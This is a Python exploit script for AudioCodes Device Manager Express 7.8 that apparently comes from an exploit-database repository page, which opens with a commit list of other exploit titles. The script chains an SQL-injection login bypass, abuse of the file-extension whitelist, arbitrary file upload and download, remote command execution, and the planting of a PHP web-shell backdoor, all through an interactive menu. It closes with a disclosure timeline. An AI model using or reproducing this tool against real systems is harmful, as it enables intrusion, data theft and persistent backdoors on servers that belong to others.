42ade901fe
22 changes to exploits/shellcodes/ghdb LISTSERV 17 - Insecure Direct Object Reference (IDOR) LISTSERV 17 - Reflected Cross Site Scripting (XSS) Router ZTE-H108NS - Stack Buffer Overflow (DoS) Router ZTE-H108NS - Authentication Bypass Boa Web Server v0.94.14 - Authentication Bypass Covenant v0.5 - Remote Code Execution (RCE) Dreamer CMS v4.0.0 - SQL Injection Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) Virtual Reception v1.0 - Web Server Directory Traversal 4images 1.9 - Remote Command Execution (RCE) ClicShopping v3.402 - Cross-Site Scripting (XSS) Concrete5 CME v9.1.3 - Xpath injection Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) Ecommerse v1.0 - Cross-Site Scripting (XSS) Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS) WPForms 1.7.8 - Cross-Site Scripting (XSS) CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Zillya Total Security 3.0.2367.0 - Local Privilege Escalation
191 lines
No EOL
6.8 KiB
Python
Executable file
191 lines
No EOL
6.8 KiB
Python
Executable file
# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
|
|
# Date: 02-12-22
|
|
# Exploit Author: 0xEF
|
|
# Vendor Homepage: https://www.audiocodes.com
|
|
# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
|
|
# Version: <= 7.8.20002.47752
|
|
# Tested on: Windows 10 & Windows Server 2019
|
|
# Default credentials: admin/admin
|
|
# SQL injection + Path traversal + Remote Command Execution
|
|
# CVE: CVE-2022-24627, CVE-2022-24629, CVE-2022-24630, CVE-2022-24632
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import requests
|
|
import sys
|
|
import time
|
|
import re
|
|
import colorama
|
|
from colorama import Fore, Style
|
|
import uuid
|
|
|
|
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
|
|
|
|
def menu():
|
|
print('-----------------------------------------------------------------------\n'
|
|
'AudioCodes Device Manager Express 45 78 70 6C 6F 69 74 \n'
|
|
'-----------------------------------------------------------------------')
|
|
|
|
def optionlist(s,target):
|
|
try:
|
|
print('\nOptions: (Press any other key to quit)\n'
|
|
'-----------------------------------------------------------------------\n'
|
|
'1: Upload arbitrary file\n'
|
|
'2: Download arbitrary file\n'
|
|
'3: Execute command\n'
|
|
'4: Add backdoor\n'
|
|
'-----------------------------------------------------------------------')
|
|
option = int(input('Select: '))
|
|
if(option == 1):
|
|
t = 'a'
|
|
upload_file(s,target,t)
|
|
elif(option == 2):
|
|
download_file(s,target)
|
|
elif(option == 3):
|
|
execute(s,target)
|
|
elif(option == 4):
|
|
t = 'b'
|
|
upload_file(s,target,t)
|
|
except:
|
|
sys.exit()
|
|
|
|
|
|
def bypass_auth(target):
|
|
try:
|
|
print(f'\nTrying to bypass authentication..\n')
|
|
url = f'http://{target}/admin/AudioCodes_files/process_login.php'
|
|
s = requests.Session()
|
|
# CVE-2022-24627
|
|
payload_list = ['\'or 1=1#','\\\'or 1=1#','admin']
|
|
for payload in payload_list:
|
|
body = {'username':'admin','password':'','domain':'','p':payload}
|
|
r = s.post(url, data = body)
|
|
if('Configuration' in r.text):
|
|
print(f'{Fore.GREEN}(+) Authenticated as Administrator on: {target}{Style.RESET_ALL}')
|
|
time.sleep(1)
|
|
return(s)
|
|
else:
|
|
print(f'{Fore.RED}(-) Computer says no, can\'t login, try again..{Style.RESET_ALL}')
|
|
main()
|
|
except:
|
|
sys.exit()
|
|
|
|
def upload_file(s,target,t):
|
|
try:
|
|
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?type='
|
|
param = uuid.uuid4().hex
|
|
file = input('\nEnter file name: ')
|
|
# read extension
|
|
ext = file.rsplit( ".", 1 )[ 1 ]
|
|
if (t=='b'):
|
|
# remove extension
|
|
file = file.rsplit( ".", 1 )[ 0 ] + '.php'
|
|
ext = 'php'
|
|
patch = '1'
|
|
if(file != ''):
|
|
if(patch_ext(s,target,patch,ext)):
|
|
# CVE-2022-24629
|
|
print(f'{Fore.GREEN}(+) Success{Style.RESET_ALL}')
|
|
if(t=='a'):
|
|
dest = input('\nEnter destination location (ex. c:\): ')
|
|
print(f'\nUploading file to {target}: {dest}{file}')
|
|
files = {'myfile': (file, open(file,'rb'), 'text/html')}
|
|
body = {'dir': f'{dest}', 'type': '', 'Submit': 'Upload'}
|
|
r = s.post(url, files=files, data=body)
|
|
print(f'{Fore.GREEN}(+) Done{Style.RESET_ALL}')
|
|
if(t=='b'):
|
|
shell = f'<?php echo shell_exec($_GET[\'{param}\']); ?>'
|
|
files = {f'myfile': (file, shell, 'text/html')}
|
|
body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
|
|
r = s.post(url, files=files, data=body)
|
|
print(f'\nBackdoor location:')
|
|
print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
|
|
patch = '2'
|
|
time.sleep(1)
|
|
patch_ext(s,target,patch,ext)
|
|
else:
|
|
print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}')
|
|
except:
|
|
print(f'{Fore.RED}(-) Computer says no..{Style.RESET_ALL}')
|
|
patch = '2'
|
|
patch_ext(s,target,patch,ext)
|
|
|
|
def download_file(s,target):
|
|
# CVE-2022-24632
|
|
try:
|
|
file = input('\nFull path to file, eg. c:\\windows\win.ini: ')
|
|
if(file != ''):
|
|
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?view={file}'
|
|
r = s.get(url)
|
|
if (len(r.content) > 0):
|
|
print(f'{Fore.GREEN}\n(+) File {file} downloaded\n{Style.RESET_ALL}')
|
|
file = str(file).split('\\')[-1:][0]
|
|
open(file, 'wb').write(r.content)
|
|
else:
|
|
print(f'{Fore.RED}\n(-) File not found..\n{Style.RESET_ALL}')
|
|
else:
|
|
print(f'{Fore.RED}\n(-) Computer says no..\n{Style.RESET_ALL}')
|
|
except:
|
|
sys.exit()
|
|
|
|
def execute(s,target):
|
|
try:
|
|
while True:
|
|
# CVE-2022-24631
|
|
command = input('\nEnter a command: ')
|
|
if(command == ''):
|
|
optionlist(s,target)
|
|
break
|
|
print(f'{Fore.GREEN}(+) Executing: {command}{Style.RESET_ALL}')
|
|
body = 'ssh_command='+ command
|
|
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?cmd=ssh'
|
|
r = s.post(url, data = body, headers=headers)
|
|
print('-----------------------------------------------------------------------')
|
|
time.sleep(1)
|
|
print((", ".join(re.findall(r'</form>(.+?)</section>',str(r.content)))).replace('\\r\\n', '').replace('</div>', '').replace('<div>', '').replace('</DIV>', '').replace('<DIV>', '').replace('<br/>', '').lstrip())
|
|
print('-----------------------------------------------------------------------')
|
|
except:
|
|
sys.exit()
|
|
|
|
def patch_ext(s,target,opt,ext):
|
|
try:
|
|
if(opt == '1'):
|
|
print('\nTrying to add extension to whitelist..')
|
|
body = {'action':'saveext','extensions':f'.cab,.cfg,.csv,.id,.img,.{ext},.zip'}
|
|
if(opt == '2'):
|
|
print('\nCleaning up..')
|
|
body = {'action':'saveext','extensions':'.cab,.cfg,.csv,.id,.img,.zip'}
|
|
print(f'{Fore.GREEN}(+) {ext.upper()} extension removed\n{Style.RESET_ALL}')
|
|
url = f'http://{target}/admin/AudioCodes_files/ajax/ajaxGlobalSettings.php'
|
|
r = s.post(url, data = body, headers=headers)
|
|
time.sleep(1)
|
|
if(f'{ext}' in r.text):
|
|
return True
|
|
except:
|
|
sys.exit()
|
|
|
|
def main():
|
|
if len(sys.argv) != 2:
|
|
print(' Usage: ' + sys.argv[0] + ' <target IP>')
|
|
print(' Example: ' + sys.argv[0] + ' 172.16.86.154')
|
|
sys.exit(1)
|
|
|
|
target = sys.argv[1]
|
|
menu()
|
|
s = bypass_auth(target)
|
|
if(s):
|
|
optionlist(s,target)
|
|
|
|
if __name__ == '__main__':
|
|
main()
|
|
|
|
# Timeline
|
|
# 11-11-2021 Vulnerabilities discovered
|
|
# 12-11-2021 PoC written
|
|
# 15-11-2021 Details shared with vendor
|
|
# 02-12-2021 Vendor confirmed vulnerabilities
|
|
# 03-12-2021 CVE's requested
|
|
# 09-12-2021 Vendor replied with solution and notified customers
|
|
# 07-02-2022 Product EOL announced
|
|
# 10-03-2022 CVE's assigned
|
|
# 02-12-2022 Disclosure of findings |